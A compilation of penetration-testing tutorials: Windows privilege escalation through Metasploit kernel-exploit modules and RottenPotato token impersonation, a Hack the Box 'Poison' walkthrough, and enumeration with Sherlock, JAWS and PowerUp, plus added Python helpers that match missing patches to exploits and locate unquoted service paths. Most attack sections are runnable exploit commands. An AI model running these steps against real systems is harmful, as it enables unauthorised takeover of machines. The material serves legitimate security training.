Windows Kernel Exploit Privilege Escalation


Hello Friends!! In our previous article we discussed "Vectors of Windows Privilege Escalation using automated script", and today we are demonstrating Windows privilege escalation via kernel exploitation. For this purpose we will use a built-in Metasploit module, the Local Exploit Suggester. Its job is to identify which local exploits in the framework match the target (platform, architecture and session type) and give us a short list of candidates that can be tried to elevate privileges; it is a starting point, not a guarantee that any of them will work.
Table of content
§  Windows-Exploit-suggester
§  Windows ClientCopyImage Win32k Exploit
§  Windows TrackPopupMenu Win32k NULL Pointer Dereference
§  Windows SYSTEM Escalation via KiTrap0D
§  Windows Escalate Task Scheduler XML Privilege Escalation
§  MS16-016 mrxdav.sys WebDav Local Privilege Escalation
§  EPATHOBJ::pprFlattenRec Local Privilege Escalation
§  MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
§  MS16-032 Secondary Logon Handle Privilege Escalation
§  RottenPotato


Windows-Exploit-suggester
Despite the heading, the tool used here is Metasploit's built-in post/multi/recon/local_exploit_suggester module (the stand-alone Windows-Exploit-Suggester script by GDSSecurity is a different tool that works offline from systeminfo output). The module lists the local exploits that may apply to an existing session, based on the session type, the platform (the operating system the session is running on), the architecture and the default options each exploit needs. It saves time because we do not have to search the framework manually for local exploits; manual research is only needed if none of the suggested options works.
It is also significant to note that the module does not fire the exploits: it only runs each candidate's check method where one exists, so "possibly vulnerable" is a hint, not proof that an exploit will succeed.
Usage
Note: to use the Local Exploit Suggester we must already have a Meterpreter session on the target. Before running it, put the active Meterpreter session into the background (type background, or press CTRL + Z).
Below is an example; let's say our existing Meterpreter session is 1. The module is found with msfconsole's own search command (not searchsploit, which queries Exploit-DB) and then pointed at the session:
search local_exploit_suggester
use post/multi/recon/local_exploit_suggester
set LHOST 192.168.1.107
set SESSION 1
exploit

As you can observe, it has suggested some local exploits that the target appears vulnerable to and that can provide a higher-privilege shell.


Windows ClientCopyImage Win32k Exploit
Vulnerabilities in Windows Kernel-Mode Drivers could allow elevation of privilege. This module exploits improper object handling in the win32k.sys kernel mode driver.
This module has been tested on vulnerable builds of Windows 7 x64 and x86, Windows 2008 R2 SP1 x64.
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms15_051_client_copy_image
set lhost 192.168.1.107
set session 1
exploit

Once the exploit has run, another Meterpreter session opens. Because the payload is launched from the context the exploit elevated, the new session already runs as SYSTEM; interact with it and verify:

getsystem
getuid

getuid shows that we are now NT AUTHORITY\SYSTEM, the Windows privileged user.



Windows TrackPopupMenu Win32k NULL Pointer Dereference
This module exploits a NULL pointer dereference in win32k.sys that can be triggered through TrackPopupMenu. Under special conditions the NULL pointer dereference can be abused in xxxSendMessageTimeout to achieve arbitrary code execution in kernel mode.
This module has been tested on Windows XP SP3, Windows Server 2003 SP2, Windows 7 SP1, Windows Server 2008 32-bit and Windows Server 2008 R2 SP1 64-bit.
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms14_058_track_popup_menu
set lhost 192.168.1.107
set session 1
exploit

Another Meterpreter session opens once the exploit has executed; it already runs in the elevated context. Confirm it:

getsystem
getuid

getuid reports NT AUTHORITY\SYSTEM, the Windows privileged user.


Windows SYSTEM Escalation via KiTrap0D
This module creates a new session with SYSTEM privileges via the KiTrap0D exploit. If the session in use is already elevated, the exploit will not run. The module relies on kitrap0d.x86.dll and is not supported on x64 editions of Windows.
This module has been tested on vulnerable builds of Windows Server 2003, Windows Server 2008, Windows 7 and Windows XP, 32-bit editions only.
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms10_015_kitrap0d
set lhost 192.168.1.107
set session 1
exploit

Another Meterpreter session opens once the exploit has executed. Interact with it and confirm the privilege level:

getsystem
getuid

getuid reports NT AUTHORITY\SYSTEM, the Windows privileged user.


Windows Escalate Task Scheduler XML Privilege Escalation
This vulnerability in the Task Scheduler could allow elevation of privilege.
MS10-092 resolves a publicly disclosed vulnerability in Windows Task Scheduler: an attacker who is logged on to an affected system and runs a specially crafted application can elevate to SYSTEM. Valid logon credentials and the ability to log on locally are required; the vulnerability cannot be exploited remotely or by anonymous users. The weakness is that the Task Scheduler validated its XML task definitions with a CRC32 checksum only, so a task file can be edited to run as SYSTEM and padded until the checksum matches again (the technique Stuxnet used, hence the module name "schelevator").
This module has been tested on vulnerable builds of Windows Vista, Windows 7 and Windows Server 2008, x64 and x86.
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms10_092_schelevator
set lhost 192.168.1.107
set session 1
exploit

Another Meterpreter session opens once the exploit has executed. Interact with it and confirm:

getsystem
getuid

getuid reports NT AUTHORITY\SYSTEM, the Windows privileged user.


MS16-016 mrxdav.sys WebDav Local Privilege Escalation
This module exploits the vulnerability in mrxdav.sys (the WebDAV mini-redirector driver) described by MS16-016. It spawns a process on the target system, elevates that process to NT AUTHORITY\SYSTEM and then executes the specified payload within the context of the elevated process.
This module has been tested on a vulnerable build of Windows 7 SP1, x86 architecture.
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms16_016_webdav
set lhost 192.168.1.107
set session 1
exploit

Another Meterpreter session opens once the exploit has executed. Interact with it and confirm:

getsystem
getuid

getuid reports NT AUTHORITY\SYSTEM, the Windows privileged user.


EPATHOBJ::pprFlattenRec Local Privilege Escalation
This module exploits a vulnerability in EPATHOBJ::pprFlattenRec, where the use of uninitialized data allows kernel memory to be corrupted.
At the moment, the module has been tested successfully on Windows XP SP3, Windows 2003 SP1 and Windows 7 SP1.
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ppr_flatten_rec
set lhost 192.168.1.107
set session 1
exploit

Another Meterpreter session opens once the exploit has executed. Interact with it and confirm:

getsystem
getuid

getuid reports NT AUTHORITY\SYSTEM, the Windows privileged user.


MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
A kernel pool overflow in win32k.sys (reached through NtUserMessageCall) allows local privilege escalation. The kernel shellcode nulls the ACL of the winlogon.exe process (a SYSTEM process), so any unprivileged process can freely migrate into winlogon.exe and thereby achieve privilege escalation. This bug was used in Pwn2Own 2013 by MWR to break out of Chrome's sandbox. NOTE: when you exit the Meterpreter session, winlogon.exe is likely to crash.
At the moment, the module has been tested successfully on Windows 7 SP1 x86.

Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms13_053_schlamperei
set lhost 192.168.1.107
set session 1
exploit

Another Meterpreter session opens once the exploit has executed. Interact with it and confirm:

getsystem
getuid

getuid reports NT AUTHORITY\SYSTEM, the Windows privileged user. Remember the note above: winlogon.exe is likely to crash when this session exits, so migrate to another SYSTEM process or finish what you need before leaving it.



MS16-032 Secondary Logon Handle Privilege Escalation
This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect Windows 7 through 10 and Server 2008 through 2012, 32- and 64-bit. The module only works against versions of Windows with PowerShell 2.0 or later and on systems with two or more CPU cores (the exploit wins a race that a single core cannot win).
Let's navigate to MSF console and execute this exploit
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set session 1
exploit

Another Meterpreter session opens once the exploit has executed. Interact with it and confirm:

getsystem
getuid

getuid reports NT AUTHORITY\SYSTEM, the Windows privileged user.



RottenPotato
RottenPotato is a local privilege escalation from a service account to SYSTEM. It needs a service account that holds SeImpersonatePrivilege (the IIS and SQL Server accounts are typical): it coerces the local SYSTEM account into an NTLM authentication over DCOM, relays that authentication to the local RPC endpoint and ends up with a SYSTEM token that the current process is allowed to impersonate.
It is important to impersonate the token (or run list_tokens -u) quickly after running the binary: with the current implementation, the token disappears shortly after the binary exits. It is also important to follow the order of the steps. Make sure you load incognito before running the binary.
Incognito, now a Meterpreter extension, was originally a stand-alone application that let you impersonate user tokens after compromising a system. The first thing to do is identify whether any valid tokens are already present on the system:
load incognito
list_tokens -u
Looking at the impersonation tokens, you can see that currently no SYSTEM token is available.

Now download RottenPotato from GitHub:
git clone https://github.com/foxglovesec/RottenPotato.git
cd RottenPotato
The repository contains a pre-built rottenpotato.exe.
Upload the exe file to the victim's machine through the Meterpreter session:
upload /root/Desktop/RottenPotato/rottenpotato.exe .
Now execute the binary (hidden and channelized) and, straight after, impersonate the SYSTEM token it adds to the list of impersonation tokens:
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
getuid now reports that we are running as NT AUTHORITY\SYSTEM, the Windows privileged user.

Hack the box: Poison Walkthrough

Hello everyone and welcome to yet another CTF challenge from Hack the Box, called "Poison", which is available online for those who want to improve their penetration testing and black-box testing skills. Poison is a retired vulnerable lab from Hack the Box, which offers online penetration testing practice matched to your experience level; they have a large collection of vulnerable labs, ranging from beginner to expert level.

Level: Easy
Task: Find user.txt and root.txt in victim’s machine

Methodology:
1.      Port scanning
2.      Using LFI to find username
3.      Gaining encrypted password file using LFI
4.      Decrypting password file
5.      Logging in to SSH using decrypted password
6.      Transferring ZIP file and extracting to find a secret file
7.      Discovery of VNC on machine
8.      VNC tunneling over SSH to get root shell
9.      Grabbing flag

Let’s get started then!

Since these labs have static IPs, the IP address for Poison is 10.10.10.84.
Let us scan the VM with the most popular port scanning tool, nmap, with service and version detection enabled:

nmap -A 10.10.10.84



From the result above we found two open ports on the VM, 22 and 80, the default ports for SSH and HTTP.
We immediately headed over to the web page.



It was clear just from reading the page that an LFI vulnerability was involved: the page takes a script name as a parameter and includes that file. We tested it by passing /etc/passwd in the scriptname field.



Which led us to the following output



From here we found that the username was "charix". But before moving on to that, we tried all the script names listed on the previous web page one by one.
It was all monotonous until we found an interesting text file via the "listfiles.php" script.




The listfiles.php was a script that enumerated an array of the files


We found an interesting file called pwdbackup.txt. On opening it by the same process we found an encrypted password.



But it wasn't really encryption: the password had been base64-encoded 13 times. Just by looking at it (the base64 alphabet and the trailing = padding) we could tell it was base64. So we copied the blob into a file named decode, removed the line breaks between the lines of the blob (present by default), and chained base64 -d thirteen times to decode it:

cat decode | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d
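The thirteen-fold pipe works here but does not generalise; a blob may be wrapped any number of times. Below is an added example (not part of the original walkthrough) that strips the whitespace the file contains, decodes base64 layer by layer and stops as soon as the output no longer looks like base64 or is no longer printable text. The sample input is constructed by wrapping the recovered password 13 times with base64.encodebytes, which inserts line breaks the way pwdbackup.txt had them.

```python
import base64
import binascii
import re
import sys
from typing import Tuple

# Shape check: base64 alphabet, optional trailing padding, nothing else.
B64_SHAPE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
WHITESPACE = re.compile(rb"\s+")


def is_printable(data: bytes) -> bool:
    """True when every byte is printable ASCII or ordinary whitespace."""
    return all(0x20 <= b <= 0x7E or b in b"\t\r\n" for b in data)


def peel_base64(blob: bytes, max_layers: int = 64) -> Tuple[bytes, int]:
    """Decode nested base64 until the data is no longer base64-shaped.

    Returns (innermost data, number of layers removed). A layer is only
    removed if the decoded result is printable text, so a plaintext that
    happens to look like base64 is not decoded into garbage.
    """
    data = blob
    layers = 0
    while layers < max_layers:
        compact = WHITESPACE.sub(b"", data)          # the file was line-wrapped
        if not compact or len(compact) % 4 or not B64_SHAPE.match(compact):
            break
        try:
            decoded = base64.b64decode(compact, validate=True)
        except binascii.Error:
            break
        if not is_printable(decoded):
            break                                     # current layer is the payload
        data, layers = decoded, layers + 1
    return data, layers


def make_nested(plain: bytes, layers: int) -> bytes:
    """Constructed test input: wrap `plain` the given number of times,
    with the 76-column line breaks base64.encodebytes inserts."""
    data = plain
    for _ in range(layers):
        data = base64.encodebytes(data)
    return data


if __name__ == "__main__":
    if len(sys.argv) > 1:
        raw = open(sys.argv[1], "rb").read()          # e.g. the saved pwdbackup.txt
    else:
        raw = make_nested(b"Charix!2#4%6&8(0", 13)    # constructed sample
    secret, depth = peel_base64(raw)
    print(f"{depth} layers removed: {secret.decode('ascii', 'replace')}")
```

Run it with the saved blob as the only argument; without an argument it decodes the constructed sample and reports 13 layers. The printable-text stop condition is the important design choice: without it, any alphanumeric password whose length is a multiple of four would be "decoded" one layer too far.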



Voila! The password was found to be Charix!2#4%6&8(0.
A complete shot in the dark was that this was also the SSH password of the user charix we had seen in /etc/passwd. So we tried logging in to SSH as charix and listed the home directory:

ls



And just like that we were logged in! We found the first flag (user.txt) and another file called secret.zip.

We tried unzipping it on the box, but it didn't work. So instead we transferred the file to our system using scp (complete article here) and extracted it locally:

scp charix@10.10.10.84:secret.zip /root/Desktop/
cd Desktop
unzip secret.zip



We got a file "secret", which could be the password for another service.
We were far from convinced that no other service was running, so we listed the listening sockets on the victim with sockstat, the FreeBSD socket-listing tool (not socat; a Linux port is documented at https://packages.debian.org/sid/sockstat):

sockstat -4 -l



Ports 5901 and 5908 were listening, and 5901 is the default port for VNC display :1. This could be our way in. Because the service is bound to the loopback interface only, we cannot reach it directly from our machine, so we followed the SSH tunneling methodology (refer here) and forwarded local port 5901 to 127.0.0.1:5901 on the victim:

ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84




It will open a shell on the victim, and the tunnel stays up for as long as that SSH session does. In a new terminal, connect through the forwarded port, passing the extracted secret file as the VNC password file:

vncviewer -passwd secret 127.0.0.1:5901

We saw the "authentication successful" message, and the VNC session handed us a root shell. What was left now but to:

ls
cat root.txt

Window Privilege Escalation via Automated Script


After compromising a victim's machine we usually have a low-privileged shell that we want to escalate into a higher-privileged one; this process is known as privilege escalation. In this article we discuss what privilege escalation involves and how an attacker can identify whether a low-privileged shell can be escalated to a higher-privileged one.

Table of Content
§  Introduction
§  Vectors of Privilege Escalation
§  Windows-Exploit-Suggester
§  Windows Gather Applied Patches
§  Sherlock
§  JAWS - Just Another Windows (Enum) Script
§  PowerUp

Introduction
Privilege escalation is the phase that follows the compromise of the victim's machine, in which the attacker gathers critical information about the system, such as stored passwords, weakly configured services or applications and missing patches. All of this information helps the attacker choose the post-exploitation step that yields a higher-privileged shell.

Vectors of Privilege Escalation
The following information is considered critical on a Windows system:
§  Version of operating system
§  Any Vulnerable package installed or running
§  Files and Folders with Full Control or Modify Access
§  Mapped Drives
§  Potentially Interesting Files
§  Unquoted Service Paths
§  Network Information (interfaces, arp, netstat)
§  Firewall Status and Rules
§  Running Processes
§  AlwaysInstallElevated Registry Key Check
§  Stored Credentials
§  DLL Hijacking
§  Scheduled Tasks

Several scripts are used in penetration testing to quickly identify potential privilege escalation vectors on Windows systems, and today we are going to walk through each of the ones that work smoothly.

Windows-Exploit-Suggester
If you have a low-privilege Meterpreter or command session on the victim, you can use the Local Exploit Suggester.
This module suggests local Meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform of the session the user has opened, as well as the local exploits available in the framework. It is important to note that not all local exploits will be fired: exploits are chosen based on session type, platform, architecture and required default options, and each candidate's check method is run where one exists.

use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > set lhost 192.168.1.107
msf post(local_exploit_suggester) > set session 1
msf post(local_exploit_suggester) > exploit

As you can observe it has suggested some post exploits against which the target is vulnerable and that can provide higher-privilege shell.




Windows Gather Applied Patches
This module attempts to enumerate which patches are applied to a Windows system from the result of the WMI query SELECT HotFixID FROM Win32_QuickFixEngineering, and compares the installed KB list against the bulletins it knows about.
use post/windows/gather/enum_patches
msf post(enum_patches) > set session 1
msf post(enum_patches) > exploit


As you can observe, it also reports that the target is possibly vulnerable to recommended exploits that can provide a higher-privilege shell. Note that this is based on the hotfix list alone: a missing KB is a hint, not proof, because later cumulative updates can supersede the individual KB without it appearing in the list.
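The Local Exploit Suggester section of the kernel exploitation article above and the patch enumeration here both reduce to one question: which known bulletin is absent from the installed hotfix list, and which of the corresponding exploits fit the target's architecture and requirements. The following is an added example, written for this edit and not part of the article or of Metasploit, that answers it offline for the exploits covered above. It parses the output of wmic qfe get HotFixID (a constructed sample here), compares it with a bulletin-to-KB table and filters by architecture and CPU count (KiTrap0D, schlamperei and the MS16-016 module are x86 only; MS16-032 needs two or more cores). The KB numbers in the table are the update identifiers from the corresponding Microsoft Security Bulletins; verify them against the bulletins before relying on them.

```python
import re
from typing import Dict, List, Set, Tuple

# Bulletin -> (KB installed by the fix, Metasploit module, constraints).
# Compiled for this example from the Microsoft Security Bulletins of the
# exploits covered in the article; verify before relying on it.
BULLETINS: Dict[str, Tuple[str, str, Dict[str, object]]] = {
    "MS10-015": ("KB977165", "exploit/windows/local/ms10_015_kitrap0d",
                 {"arch": "x86"}),
    "MS10-092": ("KB2305420", "exploit/windows/local/ms10_092_schelevator", {}),
    "MS13-053": ("KB2850851", "exploit/windows/local/ms13_053_schlamperei",
                 {"arch": "x86"}),
    "MS14-058": ("KB3000061", "exploit/windows/local/ms14_058_track_popup_menu", {}),
    "MS15-051": ("KB3045171", "exploit/windows/local/ms15_051_client_copy_image", {}),
    "MS16-016": ("KB3136041", "exploit/windows/local/ms16_016_webdav",
                 {"arch": "x86"}),
    "MS16-032": ("KB3143141",
                 "exploit/windows/local/ms16_032_secondary_logon_handle_privesc",
                 {"min_cores": 2}),
}

KB_RE = re.compile(r"\bKB\d{6,7}\b", re.IGNORECASE)

# Constructed sample of `wmic qfe get HotFixID` output (not from a real host).
SAMPLE_QFE = """HotFixID
KB2305420
KB2850851
KB3000061
"""


def parse_hotfixes(wmic_output: str) -> Set[str]:
    """Extract installed KB identifiers from wmic qfe / systeminfo text."""
    return {kb.upper() for kb in KB_RE.findall(wmic_output)}


def candidate_exploits(installed: Set[str], arch: str, cores: int) -> List[Tuple[str, str]]:
    """Return (bulletin, module) pairs whose fix is not in `installed` and
    whose constraints match the session's architecture and CPU count."""
    hits: List[Tuple[str, str]] = []
    for bulletin, (kb, module, constraints) in BULLETINS.items():
        if kb in installed:
            continue                                  # patched, skip
        if constraints.get("arch", arch) != arch:
            continue                                  # exploit does not support this arch
        if cores < int(constraints.get("min_cores", 1)):
            continue                                  # race-based exploit needs more cores
        hits.append((bulletin, module))
    return hits


if __name__ == "__main__":
    installed = parse_hotfixes(SAMPLE_QFE)
    for bulletin, module in candidate_exploits(installed, arch="x86", cores=2):
        print(f"{bulletin}: fix not installed -> try {module}")
```

Feed it the real output of wmic qfe get HotFixID (or the hotfix section of systeminfo) from the target and the sysinfo values of the session. The absence of a KB remains only a hint: on Windows 7 and later, monthly rollups supersede individual updates, so the QFE list may not name the fix even though it is applied. That is why Sherlock-style checks look at the file versions of the affected binaries, and why the Metasploit suggester still runs each module's check method before you fire it.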




Sherlock
Sherlock is a PowerShell script that quickly finds missing software patches for local privilege escalation vulnerabilities. Unlike the WMI-based check above, it inspects the versions of the affected system files, so it is less misled by superseded updates. Like the post module, it reports which exploits the target is possibly vulnerable to.
Download it from GitHub with the following command; you need a Meterpreter session on the victim to run it.
git clone https://github.com/rasta-mouse/Sherlock.git




Since the script must run in PowerShell, load Meterpreter's PowerShell extension, then import the downloaded script and call its main function:
load powershell

powershell_import '/root/Desktop/Sherlock/Sherlock.ps1'
powershell_execute Find-AllVulns
The above command lists the vulnerabilities the target appears to be missing patches for, each with the exploit that can be used to achieve a higher-privilege shell.




JAWS - Just Another Windows (Enum) Script
JAWS is a PowerShell script designed to help penetration testers (and CTF players) quickly identify potential privilege escalation vectors on Windows systems. It is written for PowerShell 2.0, so it 'should' run on every Windows version since Windows 7.
Current Features
·         Network Information (interfaces, arp, netstat)
·         Firewall Status and Rules
·         Running Processes
·         Files and Folders with Full Control or Modify Access
·         Mapped Drives
·         Potentially Interesting Files
·         Unquoted Service Paths
·         Recent Documents
·         System Install Files
·         AlwaysInstallElevated Registry Key Check
·         Stored Credentials
·         Installed Applications
·         Potentially Vulnerable Services
·         MuiCache Files
·         Scheduled Tasks

git clone https://github.com/411Hall/JAWS.git



Once you have a Meterpreter shell, upload the downloaded script and drop into a command shell (shell) to run it:
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
It stores the collected information in a text file named JAWS-Enum.txt.



As said, JAWS-Enum.txt should contain the vectors that can lead to privilege escalation; let's open it and look at the results.
In the following image you can observe that it lists all user names and the IP configuration.





In this image we can clearly observe the result of netstat.





In this image we can clearly observe the running processes and services.





In this image we can clearly observe all installed programs and patches.





In this image we can clearly observe the folders with Full Control or Modify access; much more information can be extracted by running this script.




PowerUp
PowerUp is a powershell tool to assist with local privilege escalation on Windows systems. PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.
Running Invoke-AllChecks will output any identifiable vulnerabilities along with specifications for any abuse functions. The -HTMLReport flag will also generate a COMPUTER.username.html version of the report.
Current Feature
Service Enumeration:
§  Get-ServiceUnquoted - returns services with unquoted paths that also have a space in the name.
§  Get-ModifiableServiceFile - returns services where the current user can write to the service binary path or its config.
§  Get-ModifiableService - returns services the current user can modify.
§  Get-ServiceDetail - returns detailed information about a specified service.
Service Abuse:
§  Invoke-ServiceAbuse - modifies a vulnerable service to create a local admin or execute a custom command.
§  Write-ServiceBinary - writes out a patched C# service binary that adds a local admin or executes a custom command.
§  Install-ServiceBinary - replaces a service binary with one that adds a local admin or executes a custom command.
§  Restore-ServiceBinary - restores a replaced service binary with the original executable.
DLL Hijacking:
§  Find-ProcessDLLHijack - finds potential DLL hijacking opportunities for currently running processes.
§  Find-PathDLLHijack - finds service %PATH% DLL hijacking opportunities.
§  Write-HijackDll - writes out a hijackable DLL.
Registry Checks:
§  Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set.
§  Get-RegistryAutoLogon - checks for Autologon credentials in the registry.
§  Get-ModifiableRegistryAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns.

PowerUp is a module of the PowerSploit framework, so use the following commands to download the PowerSploit package from GitHub and locate the script:

git clone https://github.com/PowerShellMafia/PowerSploit.git
cd PowerSploit
ls
cd Privesc
ls




Again load the PowerShell extension, then import the downloaded script and run all of its checks:
load powershell
powershell_import '/root/Desktop/PowerSploit/Privesc/PowerUp.ps1'
powershell_execute Invoke-AllChecks
The above command reports every misconfiguration it finds, together with the abuse function that can be used to achieve a higher-privilege shell.
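PowerUp's Get-ServiceUnquoted check is worth understanding rather than just running, because the same mistake shows up in scheduled tasks and Run keys. When a service's ImagePath is unquoted and contains spaces, CreateProcess tries each space-delimited prefix (with .exe appended) as an executable before it reaches the intended binary, so a writable directory early in the path lets a low-privileged user plant a binary that the service, usually running as SYSTEM, starts. The example below is added for this edit and is not PowerUp's code: it takes a constructed list of service ImagePaths, reproduces the loader's search order, and, when run on the target itself, flags the candidates whose parent directory the current user can write to.

```python
import os
import re
from typing import Dict, List

# Everything up to the first ".exe" token is the executable; the rest are arguments.
EXE_RE = re.compile(r"(?i)^(.*?\.exe)(?:\s|$)")


def candidate_hijack_paths(image_path: str) -> List[str]:
    """Executables the loader would try, in order, for an unquoted ImagePath.

    Mirrors CreateProcess behaviour when lpApplicationName is NULL: every
    space-delimited prefix gets ".exe" appended and is tried before the
    real binary. Quoted paths and paths without spaces return [].
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []                       # quoted: unambiguous, nothing to hijack
    match = EXE_RE.match(path)
    exe = match.group(1) if match else path
    if " " not in exe:
        return []                       # no spaces: only one interpretation
    parts = exe.split(" ")
    candidates = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    candidates.append(exe)              # the binary the administrator intended
    return candidates


def find_unquoted(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Map service name -> hijack candidates for every vulnerable ImagePath."""
    findings: Dict[str, List[str]] = {}
    for name, image_path in services.items():
        candidates = candidate_hijack_paths(image_path)
        if candidates:
            findings[name] = candidates
    return findings


def writable_candidates(candidates: List[str]) -> List[str]:
    """On the target itself: keep candidates whose parent directory the current
    user can write to, which is what makes the flaw exploitable. Directories
    that do not exist on this machine are simply not writable."""
    return [c for c in candidates if os.access(os.path.dirname(c) or ".", os.W_OK)]


# Constructed sample, shaped like `wmic service get name,pathname` output.
SAMPLE_SERVICES = {
    "VulnSvc": r"C:\Program Files\Vuln App\bin\service.exe -run",
    "SafeSvc": r'"C:\Program Files\Safe App\svc.exe" -k',
    "svchost": r"C:\Windows\system32\svchost.exe -k netsvcs",
}

if __name__ == "__main__":
    for name, candidates in find_unquoted(SAMPLE_SERVICES).items():
        print(f"{name}: unquoted path, loader will try in order:")
        for candidate in candidates:
            print("   ", candidate)
        for candidate in writable_candidates(candidates):
            print("    writable parent directory, plant here:", candidate)
```

On a default installation C:\ and C:\Program Files are not writable by standard users, so the usual finding is a vendor directory with a weak ACL deeper in the path; that is the case Get-ModifiablePath in PowerUp tests for, and Invoke-ServiceAbuse then writes the binary and restarts the service.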